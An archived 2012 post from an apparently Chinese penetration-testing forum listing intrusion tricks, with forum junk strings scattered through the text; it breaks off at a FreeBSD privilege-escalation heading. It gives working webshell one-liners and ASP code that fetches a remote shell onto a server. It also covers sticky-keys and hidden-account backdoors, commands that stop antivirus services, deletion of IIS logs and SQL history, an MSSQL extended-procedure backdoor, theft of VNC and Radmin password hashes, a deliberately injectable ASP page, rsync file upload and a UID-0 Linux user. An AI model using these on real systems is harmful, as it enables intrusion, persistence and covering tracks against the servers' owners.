中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
5 |8 F2 j7 P( G, \1、读网站配置。
2、用以下VBS
2 ~) ]- y9 U  Y  q+ q0 FOn Error Resume Next
5 E4 ~1 D9 Y& k* o; Q; j/ C+ E, [If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
4 ?4 G  \- Z* K1 v        
! @4 {* @% b8 n" j  l7 D
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

, @& l  r9 k! t- L* H& }Usage:Cscript vWeb.vbs",4096,"Lilo"
0 R# s7 u3 i5 @/ @( J! ^; ~        WScript.Quit
End If
Set ObjService=GetObject

("IIS://LocalHost/W3SVC")
/ c1 E( T: ^/ d$ ?6 G' r% AFor Each obj3w In objservice
/ [, V  Z1 v# M6 w* ?        If IsNumeric(obj3w.Name)
+ e4 S: X& u" X$ h: u3 X
Then
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         
8 l+ r. Y* P  H" O
       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
& Y* Q+ E7 @- m" w- i% x                If Err
1 t+ L. k  l, Y* j8 b7 d7 h
<> 0 Then WScript.Quit (1)
                WScript.Echo Chr(10) & "[" &
$ G! d) S5 _) s  m* n
OService.ServerComment & "]"
                For Each Binds In OService.ServerBindings
; n, H. N( h6 _3 q     
$ y1 e- A) u4 }+ W9 {2 f/ R  l9 J# N+ e
/ j$ c+ E6 c% J6 N4 \! ~" p4 l                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
                        

WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
; M8 X4 x' c9 S, H. w$ T                Next
, ~1 j) X$ n: V1 l8 f6 k      
$ y( V7 }* f% @
         WScript.Echo "ath            : " & VDirObj.Path
& c2 b, J3 S* i. y$ T- F        End If
9 Q, f  l9 }7 y+ z+ |Next
复制代码
9 g2 y, ^& W" a  D3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
) l, Y, B- t+ a/ V* _  M* d5 D4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
—————————————————————
WordPress的平台，爆绝对路径的方法是：
url/wp-content/plugins/akismet/akismet.php
url/wp-content/plugins/akismet/hello.php
& d7 l- s4 l! p& Z5 m——————————————————————
( _2 ^* P/ t6 g) e! R! rphpMyAdmin暴路径办法:
! M5 M0 @( e5 H$ b& L5 ]; lphpMyAdmin/libraries/select_lang.lib.php
3 \4 e" |+ M  U5 [" k- vphpMyAdmin/darkblue_orange/layout.inc.php
1 t$ \# a, E6 L+ |/ WphpMyAdmin/index.php?lang[]=1
6 ]2 `' {7 u, x6 D  o$ |% N: S, kphpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
7 z' g( h; u, T/ }9 G$ h( Z网站可能目录(注：一般是虚拟主机类）
$ m/ r  y6 Y  \  X( A9 q' zdata/htdocs.网站/网站/
# c7 E) K$ z% L# {9 l# D: V; R————————————————————
CMD下操作VPN相关
/ p0 F( f- h" J/ Enetsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
. x8 Q# {4 h/ Z& r8 m! I* tnetsh ras ip show config #查看VPN分配IP的方式
/ O+ o8 j$ j6 n& p' bnetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
' n1 J& r5 b' h- e/ V0 |* tnetsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
* v" A- }) F5 k# m) D4 w3 y$ q————————————————————
) n" M) O) U4 Z$ E& M9 B命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
) u5 P$ ~4 `% X+ y! a) [1 uexec master.dbo.sp_addlogin test,123
* F+ @: P# G3 D1 \9 c( D- QEXEC sp_addsrvrolemember 'test, 'sysadmin'
/ F* N1 _9 V. ~. ?; L然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
5 C9 f4 L4 `, i) b0 U' U. A1 I. [z.changePassword("123456","")
z.setting("AccountType")=3;
0 G7 ~8 R5 h$ _- ^$ `
3 ~/ @/ Z$ v" w; O" y* ivbs:
Set   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
% i5 P+ D: g9 a+ y" l  Wz.changePassword "123456",""
z.setting("AccountType")=3
——————————————————
cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
3 ~; V3 y7 U+ t0 t1 P; Z
命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
cacls "目录" /d everyone               #everyone不可读，包括admin
5 q6 c1 I5 S0 B1 E* L2 r————————以下配合PR更好————
3389相关
, L! A% P( a2 ^/ ta、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
! ^4 O. Y9 |2 |0 z' ?! G% ?b、内网环境（LCX）
) @$ S, q  d- P* ^1 j( a' A, Wc、终端服务器超出了最大允许连接
XP 运行mstsc /admin
2003 运行mstsc /console   
4 {% [" y& V+ s. F
& E, c: ~  ^8 i; t! X杀软关闭（把杀软所在的文件的所有权限去掉）
处理变态诺顿企业版：
, S/ ~- h/ B5 {net stop "Symantec AntiVirus" /y
+ a% V1 O" N. \) e8 Ynet stop "Symantec AntiVirus Definition Watcher" /y
" d& `/ P; h$ ]! R) ~net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
4 l1 N3 U4 S5 Y. z: \+ `" m2 g& Znet stop "Symantec Settings Manager" /y

- [: c% P# i! E  ^% o% ~卖咖啡：net stop "McAfee McShield"
————————————————————
/ o. i. H: Q2 u9 @5 s( O1 a1 }! W- \9 H
, `/ y( O+ C* D5 @% I) J5次SHIFT：
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
' z' |7 m' |0 d; H- t% ?% |copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
——————————————————————
5 J& G/ z! [! {0 {! d/ r* Q$ N0 j隐藏账号添加：
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
5 J& X" ?) s/ |2、导出注册表SAM下用户的两个键值
6 D! C4 n% {/ T- F1 U5 e3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
) K0 v5 b: T& @- u) f——————————————————————
3 ~/ L8 p0 Z" F/ n7 E8 A0 AMSSQL扩展后门：
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
6 G$ N. i% B  U9 SGRANT exec On xp_helpsystem TO public;
+ Z4 R& t& D& `- Y———————————————————————
  Y6 P6 K" u6 Z2 h日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
" o  k3 X3 h' q8 Yex011120.log / ex011121.log / ex011124.log三个文件，
直接删除 ex0111124.log
不成功，“原文件...正在使用”
, j, q& k. ]8 X) c" O6 E当然可以直接删除ex011120.log / ex011121.log
- B$ D# \0 v; }7 x用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log

- M: t7 y. E; a" O1 S' z( n, m7 SMSSQL查询分析器连接记录清除：
MSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL

6 h# i2 S( c7 n" e( |- C% SServer\90\Tools\Shell\mru.dat
—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
* j7 ~; I0 H) VOn Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
% V  x0 U; e, ]# d) TWith Retrieval
2 l: l- S9 w. S& U; v. e  F.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
& M0 x1 x# [  \% |3 D$ l) GGetRemoteData = .ResponseBody
0 \- H8 W7 h* I" f) r/ BEnd With
Set Retrieval = Nothing
% Z& `; Z8 s" M- ]  ]0 E' C% W. USet Ads = Server.CreateObject("Adodb.Stream")
$ o1 R9 I8 S/ b2 lWith Ads
.Type = 1
2 C6 z3 j2 H% Z( R0 Q.Open
.Write GetRemoteData
5 Z! s/ N( {2 x" j! t.SaveToFile Server.MapPath(s_LocalFileName), 2
+ Q( @/ s9 Y. b* T7 u6 h.Cancel()
.Close()
0 v( d' T  Z$ I' nEnd With
4 q( ?" p- b8 Y3 u4 U/ VSet Ads=nothing
; [0 C; }9 {' [: ?End Sub
" c9 d, w, V8 x) U
eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
%>

# j/ J  |2 l) j8 q9 H5 WVNC提权方法:
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
! p. E, z) s6 H$ n: {regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
. Y/ B: O$ Z/ b2 s! H, C+ W9 {: pRadmin 默认端口是4899，
- ^0 ]% ?0 B4 {2 P0 [4 @HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
! @1 f( i+ h' b& _+ d- N1 c: p% b保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
  @& i2 h9 _: |# p! ]Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
9 ?2 B# B* R5 t# H* W3 _' g搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
% Y+ t5 s4 E% O- a6 F/ kWinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
+ d! {% K( i9 F; _# L来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
' e. Z! H. I' L& y没有删cmd组建的直接加用户。
" B$ o8 z; P4 ~0 G5 R7 X7i24的web目录也是可写，权限为administrator。
+ o& P2 a% a( B$ d. z0 E0 C
1433 SA点构建注入点。
) e" v& P- T+ o* V3 n& B<%
4 W! [* Y( P/ ]strSQLServerName = "服务器ip"
! y. ]" @+ a% {strSQLDBUserName = "数据库帐号"
2 L) G& L( n: ^  T# i4 Q. \% I* OstrSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
& [$ V/ Z! }! c( _  L4 xstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &
; U9 B: I$ i7 T: I
";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &
+ n9 `' K) E5 F' x2 N% m
* t6 `: a  ?+ Z4 ostrSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
& n  C7 b- F% `% s9 {) ^id = request("id")
+ C$ M- q. |3 istrSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close
%>
复制代码
******liunx 相关******
/ E2 j. i7 |$ ]0 j. Y: Z( g一.ldap渗透技巧
1.cat /etc/nsswitch
8 U! O0 l( h; u. h看看密码登录策略我们可以看到使用了file ldap模式
( a5 K# k4 B) c; G  ?, l
2.less /etc/ldap.conf
( i5 S2 k) _. a8 h+ Z7 t3 Cbase ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
$ x' F3 y# K" }
3.查找管理员信息
匿名方式
8 h% n) s$ @: `4 D- @ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
; w- U5 k( h6 h7 R3 Q2 y
1 Q! c+ }5 t; Z/ i: v: q: E"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
2 c* v( w" z0 x* s3 T, Lldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
$ p( S- B6 T' I# X7 T& R5 B
) u; `5 f3 d" h8 i; i( }* a"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
. ~9 P8 P5 s, O# Z% B

4.查找10条用户记录
& Y5 K) G; m. M% V1 oldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2 Z, X* O7 B2 Q0 J2 J2.less /etc/ldap.conf
8 l5 ]3 V4 F: Zbase ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
& {9 G# o, s* j
3.查找管理员信息
& S) X9 K& W; u# K. W匿名方式
" n2 E6 _# W' z* mldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
3 W3 ^9 U( q0 X! @4 A
5 @2 P3 e, H1 r* ^, k"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
- c: ?; y: o" ?) v7 Zldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


4.查找10条用户记录
( c2 d3 g% ?5 z; |. cldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
# P* Z" J" z: d. J- d
& w, B8 a- ^' T2 Y渗透实战:
9 V9 V  Q+ r% X0 r1.返回所有的属性
/ g/ O- r6 ]) K( w, ]ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
$ x9 ?1 B& |" c1 U, u4 ]6 d. ]' b) a6 F5 `8 Pdn: dc=ruc,dc=edu,dc=cn
dc: ruc
. K9 `5 _' K; y- g1 e$ T$ c6 gobjectClass: domain
, Q: ?# H. f/ p- ]: W# \' _% m
dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
% d2 o& }# r* P1 }/ VobjectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
- ], d& y) ]4 ]: eobjectClass: top
sn: manager
1 R, Z1 U' b: q. ]/ L3 F8 Mcn: manager

1 o7 W5 Q% Q8 Z' E& f8 q8 Xdn: uid=superadmin,dc=ruc,dc=edu,dc=cn
  z, G8 D9 w6 vuid: superadmin
- X3 n& P1 G$ m/ T0 M! q9 vobjectClass: inetOrgPerson
3 p5 ]5 Q7 s- H" x% A5 Y: sobjectClass: organizationalPerson
objectClass: person
! s- q6 c  e' H3 j+ P# d. VobjectClass: top
sn: superadmin
cn: superadmin

  J. g3 Y" N7 ]. U7 N1 Bdn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
, Q3 z$ ?! r* d' \8 J# [objectClass: inetOrgPerson
& @/ d6 y/ M( v3 z- x3 d; ?objectClass: organizationalPerson
7 e, |  R6 E. y# m6 K! YobjectClass: person
/ N# b0 z6 n) WobjectClass: top
) C6 ]& T3 @" e; v3 ?sn: admin
+ K& H. n) b. |cn: admin

/ O; H/ L5 @8 ~2 Q( m7 _2 Hdn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
, J" F9 B# B2 D3 Nuid: dcp_anonymous
, s: W% _( Z3 v, lobjectClass: top
: e! f8 }$ @6 SobjectClass: person
objectClass: organizationalPerson
) B( L+ b0 a+ g9 F$ L, K/ f8 i. @objectClass: inetOrgPerson
sn: dcp_anonymous
9 s4 \+ Y$ }. P5 r3 Kcn: dcp_anonymous

) q$ [/ l1 u+ Q$ u2.查看基类
5 }9 s  p, S# s% n' ]bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

/ T/ N) o% U3 K6 Nmore
. Z" b- P1 p0 U% Wversion: 1
: |' p8 h* w3 K7 m: I1 _dn: dc=ruc,dc=edu,dc=cn
5 Y7 ~9 [( Y! c. X& n- I' @dc: ruc
objectClass: domain
- d) ~# W6 S" i) r& O0 q
3.查找
' K/ X3 `1 Z( Z) ^bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
" ?' P" T6 m4 Q3 U$ iversion: 1
dn:
objectClass: top
: Z- ~' o3 C; P0 v7 x! B$ InamingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
0 k9 U9 S! u7 ]& J2 ysupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
( K3 ?& D9 w8 V9 X% z6 x' isupportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
% ^6 F6 ]! W# d) C$ I) H# @supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
* A8 v9 ?& k, U' y; a. g  lsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
5 g# ^+ |; m. g2 vsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
1 }$ G: l% X( {+ p! msupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
- X& q$ q, `3 d$ I5 WsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
& v; `, i! c! f' UsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
$ G  e, x0 @4 V8 N2 p( L4 VsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
+ E! I$ E# X. ~. _0 D( SsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
1 P/ S( v  P  L1 |; l! r! R6 usupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
6 H" R! ^2 c9 A% J% tsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
4 }6 \3 |; j; W# P0 TsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
/ f' U4 x6 X, F2 Q' |' U) x, FsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
# V) b6 I1 e8 EsupportedExtension: 1.3.6.1.4.1.1466.20037
: R' W$ k2 j# n7 K! t( }2 a& H/ vsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
8 j3 P+ d; j$ \. ssupportedControl: 2.16.840.1.113730.3.4.3
+ Z* a& R) \% a7 x4 TsupportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
5 D+ Z6 l8 j  l- j% msupportedControl: 2.16.840.1.113730.3.4.9
; w5 o6 j3 I1 ?: N: k, H* PsupportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
$ Q; L) Y" }/ D0 U* jsupportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
% S9 f1 f( s0 R  X5 L  I# dsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
2 Y! H: q8 }2 F7 r. DsupportedControl: 1.3.6.1.4.1.1466.29539.12
1 `' \/ {! c) PsupportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
/ i- d. q+ R2 E/ Y4 ksupportedControl: 2.16.840.1.113730.3.4.13
% t3 b( z1 ^! W6 _4 s: bsupportedSASLMechanisms: EXTERNAL
) ^2 F0 S. M4 z" S. ^- F/ h/ {9 OsupportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
8 E3 j* B  w; c2 msupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
- X  A! ?" w& S. z3 k3 \supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
( c; t5 t  N% Q2 ZsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
1 x, W& s. Q! e' E+ L1 U! JsupportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
5 ?+ G8 h% S% b# {6 _- S4 \supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
" s# ?* R& t6 e: D! ]1 S  NsupportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
* W: N/ |8 Q2 b7 U' FsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
5 i% r- U! `- A4 }) X. J) v4 isupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
( t1 i7 t) V" U. {* i5 YsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
2 j; D6 p: P$ z4 K* ~; o+ xsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
6 q2 c, o, ^; d3 {* CsupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
1 d" t5 [3 ^2 T6 R6 ssupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
7 `- M1 o6 Y6 Y+ {/ z1 B* FsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
) S8 s3 O0 n) E' H7 osupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
4 K. A. l! N, j& h0 }supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
0 |7 j' Z$ Q& w! jsupportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
% h0 ?8 H7 Q2 }4 @8 S4 g5 ]supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
3 E) R6 e' X( E( csupportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
9 [) @" Z( }5 w% Y  VsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
# m6 _" X: h+ Y9 C( NsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
( j8 P& |" o2 m$ B; [supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
" f0 @9 ?) B3 v5 h5 l/ \supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
+ @# d# a, p1 k  u  R& d4 ZsupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
8 g" H% z8 Y6 l9 \8 Z; isupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
2. NFS渗透技巧
showmount -e ip
1 i0 I" L3 l" p6 G/ l列举IP
——————
' O4 Q4 i" V# ^; n' s6 w- u3.rsync渗透技巧
1.查看rsync服务器上的列表
rsync 210.51.X.X::
  u, r$ S) d# u* t6 O, ofinance
img_finance
auto
img_auto
html_cms
5 [5 x3 D; I6 Iimg_cms
ent_cms
ent_img
) `* T9 S* j) Y9 J( |; ?+ E  Hceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
2 t: ]: o; W0 Dgames
gamesimg
  Q; r+ v& t# [4 D" Pmedia
2 U7 o* U* x) {+ U/ \; t  Y% Hmediaimg
, B2 q: u4 v5 `1 p' vfashion
res-fashion
9 l' t; a  p0 w% ^; }res-fo
taobao-home
5 N" l+ F# r' y# D9 `% t! I6 Sres-taobao-home
" g' J9 O3 V3 F+ h2 q' r8 p  Ehouse
res-house
res-home
6 E" t% F( r1 {/ S1 z, c1 K1 Xres-edu
- @4 ~9 z: V$ O" K6 kres-ent
3 @2 A( w$ f: o" Lres-labs
res-news
9 h, p" Q! L) u# I. Cres-phtv
. l5 h0 ]4 r) sres-media
' K9 n+ }* q  ~4 o0 Ghome
edu
news
) h: k0 `/ k) p3 Yres-book
2 o1 u, c  |1 x' @, b) C3 N
看相应的下级目录(注意一定要在目录后面添加上/)
( ?5 M8 S) w; @0 [* E

5 C) M$ q% ~- A8 }4 w/ ?' a- ?rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
% U3 n9 L) D: g# Y% jrsync 210.51.X.X::edu/
8 i- n+ H* g0 g: `- n
# k; v* i# r; x+ S- g. r# O, u2.下载rsync服务器上的配置文件
7 ]1 l0 _  Z3 R- qrsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

* U$ v$ W9 w& q! T) H: [$ ?3.向上更新rsync文件(成功上传,不会覆盖)
+ i. }9 U$ \) f, hrsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
0 N  N" F( N; N5 thttp://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧
' [: H3 J( S7 `& Unc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
# J# J9 W* F. ]5 g* E  X- X五.SSH端口转发
. y; {$ l2 W+ N8 M& xssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
4 V3 d- a8 M. q7 `$ w5 N* M) o
( ?6 N: f3 f  Q/ H六.joomla渗透小技巧
: i3 D3 L  J3 N确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-

15&catid=32:languages&Itemid=47
8 R) t# Q: [- n8 _1 R+ L# d7 v, }6 W( ~
& {! ?& ^% b, j* m重新设置密码
- G& L' w7 d5 S3 S8 X& O# L3 Q$ j2 Qindex.php?option=com_user&view=reset&layout=confirm
0 N0 \6 t( I! N7 J9 |
, Y7 \# N& n* Q8 I- j) U七: Linux添加UID为0的root用户
$ y/ w% A* |" C: W2 Xuseradd -o -u 0 nothack
; w6 P: B$ n: ^9 X0 S/ h7 F
八.freebsd本地提权
* V5 l: l( |$ Y4 P[argp@julius ~]$ uname -rsi
